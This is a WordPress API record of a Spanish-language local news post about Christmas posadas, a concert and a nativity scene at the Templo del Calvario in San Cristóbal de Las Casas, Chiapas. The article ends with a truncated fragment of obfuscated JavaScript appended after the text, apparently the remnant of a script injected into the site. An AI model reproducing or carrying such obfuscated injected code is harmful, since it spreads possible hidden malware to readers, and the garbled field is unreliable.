{"id":7534,"date":"2022-12-22T04:15:20","date_gmt":"2022-12-22T04:15:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7534"},"modified":"2022-12-22T04:15:20","modified_gmt":"2022-12-22T04:15:20","slug":"realizan-posadas-navidenas-en-el-templo-del-calvario-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7534","title":{"rendered":"Realizan posadas navide\u00f1as en el Templo del Calvario en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"796\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221221-WA0102-796x1024.jpg\" alt=\"\" class=\"wp-image-7535\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221221-WA0102-796x1024.jpg 796w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221221-WA0102-233x300.jpg 233w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221221-WA0102-768x988.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221221-WA0102.jpg 995w\" sizes=\"auto, (max-width: 796px) 100vw, 796px\" \/><figcaption class=\"wp-element-caption\">L<\/figcaption><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal 21 de Diciembre del 2022. San Crist\u00f3bal de Las Casas.- La Capellan\u00eda de Nuestra Se\u00f1ora de La Merced, la Di\u00f3cesis de esta ciudad y el Templo del Calvario, realizar\u00e1n hasta el 23 de diciembre, a partir de las cinco de la tarde, en beneficio del templo y las festividades 2023 del Se\u00f1or del Calvario, seg\u00fan dieron a conocer integrantes de la Mesa Directiva de la Comisi\u00f3n de J\u00f3venes.El presidente de la Comisi\u00f3n del J\u00f3venes del Se\u00f1or del Calvario, Daniel Montoya dio a conocer que este 21 de diciembre se present\u00f3 \u201cA\u00f1oranza Musical\u201d al interior del templo, mientras que para el 22 tendr\u00e1n el Show de Zapat\u00edn que es para todas las edades y el 23 de diciembre en la ma\u00f1ana va haber una Kermes.\u201cLa eucarist\u00eda ser\u00e1 a las 10 de la ma\u00f1ana, hay otra a la una de la tarde, habr\u00e1 un taller navide\u00f1o a las seis de la tarde y a las siete de la noche un concierto navide\u00f1o impartido por Juventud Mercedaria, es la primera ocasi\u00f3n que hacemos esto, porque es nuestro primer a\u00f1o como Comisi\u00f3n\u201d.Por su parte, Luis Antonio G\u00f3mez, vicepresidente de la Comisi\u00f3n de J\u00f3venes se\u00f1al\u00f3 que tambi\u00e9n cuentan con un Nacimiento que fue hecho con la ayuda de Juventud Mercedaria, con motivo de las posadas, \u201canteriormente se hac\u00eda en la parte lateral del templo en la capilla de velas pero por iniciativa de nosotros y Juventud Mercedaria se hizo dentro, para que la gente venga a visitar, est\u00e1n abiertas las puertas del templo de nueve de la ma\u00f1ana a dos de la tarde y de cuatro de la tarde a siete de la noche\u201d.\u201cInvitamos a que vengan los ni\u00f1os, adolescentes, adultos a las posadas que se realizan esta semana de cinco a seis de la tarde, que visiten el templo para que conozcan y vean el nacimiento que hemos realizado con Juventud Mercedaria\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>L \u00d3scar G\u00f3mez\/ Corresponsal 21 de Diciembre del 2022. San Crist\u00f3bal de Las Casas.- La Capellan\u00eda de Nuestra Se\u00f1ora de La Merced, la Di\u00f3cesis de esta ciudad y el Templo del Calvario, realizar\u00e1n hasta el 23 de diciembre, a partir de las cinco de la tarde, en beneficio del templo y las festividades 2023 del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7535,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7534","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7534","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7534"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7534\/revisions"}],"predecessor-version":[{"id":7536,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7534\/revisions\/7536"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7535"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7534"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7534"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7534"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}